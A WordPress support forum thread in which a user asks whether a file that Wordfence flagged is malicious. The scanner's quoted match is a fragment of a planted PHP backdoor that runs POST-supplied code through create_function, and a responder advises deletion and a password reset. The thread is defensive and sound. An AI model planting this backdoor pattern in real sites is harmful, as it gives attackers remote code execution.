Is this a malicious file?
-
Greetings,
A Wordfence scan reported that the following file appears to be malicious:
Filename: wp-content/plugins/admin-bar.php
File Type: Not a core, theme, or plugin file from www.remarpro.com.
Details: This file appears to be installed or modified by a hacker to perform malicious activity. If you know about this file you can choose to ignore it to exclude it from future scans. The matched text in this file is: @setcookie( ‘f_pp’, $_POST[‘f_pp’] );\x0d\x0a\x09$shortcode_unautop = create_function( ”, $wpautop );\x0d\x0a\x09unset( $f_pp, $wpautop );\x0d\x0a\x09$shortcode_unautop()The issue type is: Suspicious:PHP/eval.userfunction.6631
Description: Suspicious creation and execution of a functionCan anyone confirm if this is indeed the case? It reports that the file was last edited in February 2018.
-
Hey @jerethi99,
Please delete this file immediately. It’s disguised as a WordPress Core file, but it’s in the wrong place and does contain potentially malicious code.
Additionally, I’d suggest changing all passwords, including WordPress, database, and (s)FTP/hosting control panel.
Here’s a guide that can help you clean the site and make sure it’s secure. However, if an issue like this returns I’d suggest getting with a professional hack repair service to clean and patch the site.
https://www.wordfence.com/docs/how-to-clean-a-hacked-wordpress-site-using-wordfence/
Thanks,
Gerroald
- The topic ‘Is this a malicious file?’ is closed to new replies.
